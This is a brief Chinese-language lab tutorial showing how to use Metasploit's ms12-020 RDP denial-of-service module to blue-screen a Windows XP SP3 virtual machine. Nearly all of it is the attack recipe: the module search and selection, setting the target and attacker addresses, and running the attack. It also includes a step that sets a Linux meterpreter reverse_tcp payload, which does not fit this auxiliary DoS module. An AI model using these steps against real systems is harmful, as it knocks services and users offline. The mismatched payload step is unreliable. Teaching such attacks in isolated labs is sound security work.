本篇文章介绍关于msfconsole模块中ms12-020漏洞的解析。

实验背景:

    都是在虚拟机下进行的啦,靶机采用的是winxpens3,确保所用的靶机有相关的漏洞才能攻击成功哦。并且攻击机和靶机要处在同一局域网下才行哒,建议开启仅主机模式哦。还有一点,有些命令无效,可能是因为模式为普通用户模式,在命令前面使用sudo就好了,或者切换为root(su root)

实验环境:

攻击机:kali ip地址:192.168.127.139

靶机:winxpens3 ip地址:192.168.127.138

ms12-020(导致对方蓝屏)

1、配置命令

确定靶机的3389端口打开

进入msfconsole,配置如下命令:

1
search ms12-020   #查找ms12-020漏洞

查看信息,使用如下,这里因为0已经被修复,所以这里只能使用关于1的,不能使用use 0

1
use 1

或者使用如下,

1
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

选择之后,发现提示信息,按照提示信息配置:

1
set payload linux/x64/meterpreter/reverse_tcp

然后查看并配置所需命令:

1
2
3
4
5
show options

set RHOSTS 192.168.127.138 #配置靶机地址

set LHOST 192.168.127.139 #配置攻击机地址

2、运行攻击

完成前面的配置之后,运行:

1
run       #或者使用exploit,来实现攻击

查看到出现seems down 表示攻击成功,已经致使目标机蓝屏了。